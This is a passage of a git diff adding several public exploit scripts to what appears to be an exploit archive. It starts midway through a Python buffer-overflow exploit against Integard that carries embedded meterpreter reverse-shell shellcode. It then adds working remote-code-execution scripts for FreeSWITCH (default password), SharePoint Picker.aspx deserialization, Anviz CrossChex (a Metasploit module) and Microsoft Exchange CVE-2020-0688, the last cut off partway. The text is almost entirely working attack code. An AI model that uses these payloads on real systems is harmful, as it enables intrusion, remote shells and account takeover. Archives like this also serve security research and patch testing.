+    meterpreter += "\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca"
+    meterpreter += "\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04"
+    meterpreter += "\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56"
+    meterpreter += "\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda"
+    meterpreter += "\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa"
+    meterpreter += "\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94"
+    meterpreter += "\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37"
+    meterpreter += "\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88"
+    meterpreter += "\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80"
+    meterpreter += "\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe"
+    meterpreter += "\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84"
+    meterpreter += "\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f"
+    meterpreter += "\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea"
+    meterpreter += "\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b"
+    meterpreter += "\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d"
+    meterpreter += "\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36"
+    meterpreter += "\xf9\x7e\x89\x13"
+
+    if target == "1":
+        print "[*] Sending Windows XP payload using meterpreter/reverse_tcp"
+        # JMP ESP at 0x3E087557 in iertutil.dll
+        crash = "A" * 512
+        crash += pack("<L",0x3E087557)
+        crash += meterpreter
+        crash += "C" * (1500 - len(crash))
+
+        buffer = ""
+        buffer += "POST /LoginAdmin HTTP/1.1\r\n"
+        buffer += "Host: 10.0.0.130:18881\r\n"
+        buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
+        buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+        buffer += "Accept-Language: en-US,en;q=0.5\r\n"
+        buffer += "Accept-Encoding: gzip, deflate\r\n"
+        buffer += "Referer: http://10.0.0.130:18881/\r\n"
+        buffer += "Connection: close\r\n"
+        buffer += "Upgrade-Insecure-Requests: 1\r\n"
+        buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
+        buffer += "Content-Length: 78\r\n\r\n"
+        buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"
+
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((host,port))
+        s.send(buffer)
+        s.close()
+        print "[*] Done"
+
+    if target == "2":
+        print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp"
+        
+        # ASLR IS ON!!! MUST USE NON-ASLR MODULE!
+        # POP POP RET in integard.exe (ASLR disabled)
+        nSEH = "\xEB\xD0\x90\x90"   # Jump 48 bytes backwards
+        SEH = pack("<L",0x004042B0)
+
+        jumpCall = "\xEB\x09" # Jump 11 bytes forward to hit the CALL in bigBackJump
+        bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
+        
+        crash = "\x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)
+        crash += meterpreter
+        crash += "\x90" * 50
+        crash += jumpCall
+        crash += bigBackJump
+        crash += nSEH
+        crash += SEH
+
+
+        buffer = ""
+        buffer += "POST /LoginAdmin HTTP/1.1\r\n"
+        buffer += "Host: 10.0.0.130:18881\r\n"
+        buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
+        buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+        buffer += "Accept-Language: en-US,en;q=0.5\r\n"
+        buffer += "Accept-Encoding: gzip, deflate\r\n"
+        buffer += "Referer: http://10.0.0.130:18881/\r\n"
+        buffer += "Connection: close\r\n"
+        buffer += "Upgrade-Insecure-Requests: 1\r\n"
+        buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
+        buffer += "Content-Length: 78\r\n\r\n"
+        buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"
+
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((host,port))
+        s.send(buffer)
+        s.close()
+        print "[*] Done"
+
+main()
\ No newline at end of file
diff --git a/exploits/windows/remote/47799.txt b/exploits/windows/remote/47799.txt
new file mode 100644
index 000000000..147045d80
--- /dev/null
+++ b/exploits/windows/remote/47799.txt
@@ -0,0 +1,52 @@
+# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
+# Date: 2019-12-19
+# Exploit Author: 1F98D
+# Vendor Homepage: https://freeswitch.com/
+# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
+# Version: 1.10.1
+# Tested on: Windows 10 (x64)
+#
+# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
+# it after authenticating. By default commands are not accepted from remote hosts.
+#
+# -- Example --
+# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
+# Authenticated
+# Content-Type: api/response
+# Content-Length: 20
+#
+# nt authority\system
+# 
+
+#!/usr/bin/python3
+
+from socket import *
+import sys
+
+if len(sys.argv) != 3:
+    print('Missing arguments')
+    print('Usage: freeswitch-exploit.py <target> <cmd>')
+    sys.exit(1)
+
+ADDRESS=sys.argv[1]
+CMD=sys.argv[2]
+PASSWORD='ClueCon' # default password for FreeSWITCH
+
+s=socket(AF_INET, SOCK_STREAM)
+s.connect((ADDRESS, 8021))
+
+response = s.recv(1024)
+if b'auth/request' in response:
+    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
+    response = s.recv(1024)
+    if b'+OK accepted' in response:
+        print('Authenticated')
+        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
+        response = s.recv(8096).decode()
+        print(response)
+    else:
+        print('Authentication failed')
+        sys.exit(1)
+else:
+    print('Not prompted for authentication, likely not vulnerable')
+    sys.exit(1)
\ No newline at end of file
diff --git a/exploits/windows/remote/48053.py b/exploits/windows/remote/48053.py
new file mode 100755
index 000000000..8b63c4c32
--- /dev/null
+++ b/exploits/windows/remote/48053.py
@@ -0,0 +1,164 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import requests
+import sys
+from xml.sax.saxutils import escape
+from lxml import html
+import codecs
+import readline
+from clint.arguments import Args
+import signal
+
+def serialize_command(cmd):
+    total = ""
+    for x in cmd:
+        a = codecs.encode(x,"utf-16be")
+        b = codecs.encode(a,"hex").decode('ascii')
+        total += b[::-1]
+    return total
+
+def deserialize_command(cmd):
+    length = len(cmd)
+    s = ""
+    for i in range(0,length,4):
+        character = cmd[i]+cmd[i+1]+cmd[i+2]+cmd[i+3]
+        character = character[::-1]
+        c_hex = codecs.decode(character,"hex")
+        a = codecs.decode(c_hex,"utf-16be")
+        s += a
+		
+    return s
+
+#######################################    
+signal.signal(signal.SIGINT, signal.default_int_handler)
+args = Args()
+
+myargs = dict(args.grouped)
+if '--help' in myargs or '-h' in myargs:
+    help = """
+        desharialize options:
+        -h --help         - This menu
+        -u --url          - The Sharepoint Picker.aspx URL ( e.g. http://localhost/_layouts/15/Picker.aspx )
+        -c --command      - The command to run on the target Sharepoint server.
+        -f --file         - The file containing the command to run (Useful for commands with multi-lines or characters that need escaping)
+        """
+    print (help)
+    exit(0)
+    
+url = ''
+cmd = ''
+filename = ''
+if '--url' in myargs or '-u' in myargs:
+    try:
+        url = myargs['--url'][0]
+    except:
+        url = myargs['-u'][0]
+   
+if '--command' in myargs or '-c' in myargs:
+    if '--file' in myargs or '-f' in myargs:
+        print("Can't use both command and file options at the same time!")
+        exit(0)
+    try:
+        cmd = myargs['--command'][0]
+    except:
+        cmd = myargs['-c'][0]
+
+if '--file' in myargs or '-f' in myargs:
+    try:
+        filename = myargs['--file'][0]
+    except:
+        filename = myargs['-f'][0]
+    file = open(filename,mode='r')
+    cmd = file.read()
+    file.close()
+    
+
+sharepoint2019and2016 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c";
+sharepoint2013 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c";
+sharepoint2010 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=14.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c";
+            
+PY2 = sys.version_info[0] == 2
+PY3 = sys.version_info[0] == 3
+
+if PY3:
+    string_types = str,
+    raw_input = input
+else:
+    string_types = basestring,
+
+if url == '':
+    url = raw_input("Enter the SharePoint Server URL ending with Picker.aspx:")
+
+headers = {
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0',
+}
+
+firstcall = requests.get(url,headers=headers)
+spheader = firstcall.headers.get('MicrosoftSharePointTeamServices','16')
+
+spheader = int(spheader.split('.')[0])
+
+payload = "__bpzzzz35009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f3008700d600c600020067005600270037009600f600e600d30022001300e2000300220002005600e6003600f60046009600e6007600d3002200570047006600d200130063002200f300e300d000a000c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a300870037009600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a300870037004600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300d000a00002000200c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a0000200020002000200c300f4002600a6005600360047009400e600370047001600e600360056000200870037009600a3004700970007005600d300220085001600d600c60025005600160046005600270022000200f200e300d000a0000200020002000200c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e60016002700970002008700d600c600e6003700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e600720002008700d600c600e6003700a3008700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600720002008700d600c600e6003700a30035009700370047005600d600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c60096002600720002008700d600c600e6003700a3004400960016007600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d6007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d3007200970072000200f4002600a6005600360047004500970007005600d3007200b7008700a300450097000700560002004400960016007600a30005002700f6003600560037003700d70072000200d400560047008600f6004600e4001600d6005600d3007200350047001600270047007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b3003600d60046006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b300f20036000200e200e200e200140024003400e200e200e20002006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b3006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b3000200c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300"
+
+assemblyvalue = sharepoint2019and2016
+
+if spheader == 15:
+    assemblyvalue = sharepoint2013
+elif spheader == 14:
+    assemblyvalue = sharepoint2010
+else:
+    assemblyvalue = sharepoint2019and2016
+
+FullURL = url +  assemblyvalue
+
+secondcall = requests.get(FullURL,headers=headers)
+secondcalltext = secondcall.text
+
+tree = html.fromstring(secondcall.content)
+viewstate = ''
+eventvalidation = ''
+try:
+    viewstate = tree.get_element_by_id('__VIEWSTATE')
+    viewstate = viewstate.value
+except:
+    pass
+
+try:
+    eventvalidation = tree.get_element_by_id('__EVENTVALIDATION')
+    eventvalidation = eventvalidation.value
+except:
+    pass
+
+
+if cmd == '':
+    cmd = raw_input("Write your full command here to execute on the test target system (Make sure you have permissions from system owner):")
+
+
+#escapedcmd = escape(cmd,html_escape_table)
+cmd = cmd.replace("&","&")
+cmd = cmd.replace(">",">")
+cmd = cmd.replace("<","<")
+cmd = cmd.replace("\"",""")
+cmd = cmd.replace("'","&apos;")
+escapedcmd = escape(cmd)
+
+
+
+
+print(escapedcmd)
+srlcmd = serialize_command(escapedcmd)
+
+length = 1448 + len(escapedcmd)
+hex_length = format(length * 4,'x')
+serialized_length = hex_length[::-1]
+
+payload = payload.replace("e200e200e200140024003400e200e200e200",srlcmd)
+payload = payload.replace("zzzz",serialized_length)
+
+print("Deserialized Payload:")
+print(deserialize_command(payload[8:]))
+data = {"__VIEWSTATE":viewstate,"__EVENTVALIDATION":eventvalidation,"ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData":payload}
+thirdcall = requests.post(FullURL, data=data,headers=headers)
+
+print("Payload launched! Check execution results. Exiting...")
\ No newline at end of file
diff --git a/exploits/windows/remote/48092.rb b/exploits/windows/remote/48092.rb
new file mode 100755
index 000000000..e661fb7ff
--- /dev/null
+++ b/exploits/windows/remote/48092.rb
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  PACKET_LEN = 10
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Anviz CrossChex Buffer Overflow',
+      'Description'	=> %q{
+        Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
+        triggering a stack buffer overflow.
+      },
+      'Author'	  	=>
+        [
+            'Luis Catarino <lcatarino@protonmail.com>',  # original discovery/exploit
+            'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>',   # original discovery/exploit
+            'agalway-r7',  # Module creation
+            'adfoster-r7' # Module creation
+        ],
+      'License'		  => MSF_LICENSE,
+      'References'	=>
+        [
+            ['CVE', '2019-12518'],
+            ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
+            ['EDB', '47734']
+        ],
+      'Payload'        =>
+        {
+            'Space'    => 8947,
+            'DisableNops' => true
+        },
+      'Arch' => ARCH_X86,
+      'EncoderType' => Msf::Encoder::Type::Raw,
+      'Privileged'	=> true,
+      'Platform' => 'win',
+      'DisclosureDate' => '2019-11-28',
+      'Targets'        =>
+          [
+            [
+              'Crosschex Standard x86 <= V4.3.12',
+              {
+                  'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
+                  'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
+                  'Shift' => 4 # Positions payload to be written at beginning of ESP
+              }
+            ]
+          ],
+      'DefaultTarget'  => 0
+      ))
+    deregister_udp_options
+    register_options(
+        [
+            Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
+            Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
+            OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
+        ])
+  end
+
+  def exploit
+    connect_udp
+
+    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
+    if res.empty?
+      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
+    end
+
+    print_status "CrossChex broadcast received, sending payload in response"
+    sploit = rand_text_english(target['Offset'])
+    sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
+    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
+    sploit << payload.encoded
+
+    udp_sock.sendto(sploit, host, port)
+    print_status "Payload sent"
+    end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/48153.py b/exploits/windows/remote/48153.py
new file mode 100755
index 000000000..722bc6097
--- /dev/null
+++ b/exploits/windows/remote/48153.py
@@ -0,0 +1,154 @@
+# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
+# Date: 2020-02-28
+# Exploit Author: Photubias
+# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688
+#                  [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys
+# Vendor Homepage: https://www.microsoft.com
+# Version: MS Exchange Server 2010 SP3 up to 2019 CU4
+# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019
+# CVE: CVE-2020-0688
+
+#! /usr/bin/env python
+# -*- coding: utf-8 -*- 
+''' 
+
+    
+	Copyright 2020 Photubias(c)
+
+        This program is free software: you can redistribute it and/or modify
+        it under the terms of the GNU General Public License as published by
+        the Free Software Foundation, either version 3 of the License, or
+        (at your option) any later version.
+
+        This program is distributed in the hope that it will be useful,
+        but WITHOUT ANY WARRANTY; without even the implied warranty of
+        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+        GNU General Public License for more details.
+
+        You should have received a copy of the GNU General Public License
+        along with this program.  If not, see <http://www.gnu.org/licenses/>.
+        
+        File name CVE-2020-0688-Photubias.py
+        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
+
+        This is a native implementation without requirements, written in Python 2.
+        Works equally well on Windows as Linux (as MacOS, probably ;-)
+        Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net
+
+        Example Output:
+        CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c "net user pwned pwned /add"
+        [+] Login worked
+        [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570
+        [+] Detected OWA version number 15.2.221.12
+        [+] Vulnerable View State "B97B4E27" detected, this host is vulnerable!
+        [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:
+        [+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g==
+              Sending now ...
+'''
+import urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass
+
+## STATIC STRINGS
+# This string acts as a template for the serialization (contains "###payload###" to be replaced and TWO size locations)
+strSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=')
+# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)
+strSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')
+
+def convertInt(iInput, length): 
+    return struct.pack("<I" , int(iInput)).encode('hex')[:length]
+
+def getYsoserialPayload(sCommand, sSessionId):
+    ## PART1 of the payload to hash
+    strPart1 = strSerTemplate.replace('###payload###', sCommand)
+    ## Fix the length fields
+    #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))
+    #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))
+    strLength1 = convertInt(0x06b8 + len(sCommand),4)
+    strLength2 = convertInt(0x04da + len(sCommand),4)
+    strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]
+    strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]
+    
+    ## PART2 of the payload to hash
+    strPart2 = '274e7bb9'
+    for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'
+    strPart2 = binascii.unhexlify(strPart2)
+    
+    strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()
+    strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))
+    return strResult
+
+def verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):
+    if not sTarget[-1:] == '/': sTarget += '/'
+    ## Verify Login
+    lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}
+    try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()
+    except: print('[!] Error, ' + sTarget + ' not reachable')
+    bLoggedIn = False
+    for cookie in oCookjar:
+        if cookie.name == 'cadata': bLoggedIn = True
+    if not bLoggedIn:
+        print('[-] Login Wrong, too bad')
+        exit(1)
+    print('[+] Login worked')
+
+    ## Verify Session ID
+    sSessionId = ''
+    sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()
+    for cookie in oCookjar:
+        if 'SessionId' in cookie.name: sSessionId = cookie.value
+    print('[+] Got ASP.NET Session ID: ' + sSessionId)
+
+    ## Verify OWA Version
+    sVersion = ''
+    try: sVersion = sResult.split('stylesheet')[0].split('href="')[1].split('/')[2]
+    except: sVersion = 'favicon'
+    if 'favicon' in sVersion:
+        print('[*] Problem, this user has never logged in before (wizard detected)')
+        print('       Please log in manually first at ' + sTarget + 'ecp/default.aspx')
+        exit(1)
+    print('[+] Detected OWA version number '+sVersion)
+
+    ## Verify ViewStateValue
+    sViewState = ''
+    try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value="')[1].split('"')[0]
+    except: pass
+    if sViewState == 'B97B4E27':
+        print('[+] Vulnerable View State "B97B4E27" detected, this host is vulnerable!')
+    else:
+        print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)
+        ans = raw_input('[?] Still want to try the exploit? [y/N]: ')
+        if ans == '' or ans.lower() == 'n': exit(1)
+    return sSessionId, sTarget, sViewState
+    
+def main():
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')
+    parser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='')
+    parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')
+    parser.add_argument('-c', '--command', help='Command to put behind "cmd /c " (e.g. net user pwned pwned /add)', default='')
+    args = parser.parse_args()
+    if args.target == '' or args.username == '' or args.command == '':
+        print('[!] Example usage: ')
+        print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c "net user pwned pwned /add"')
+    else:
+        if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')
+        else: sPassword = args.password
+        ctx = ssl.create_default_context()
+        ctx.check_hostname = False
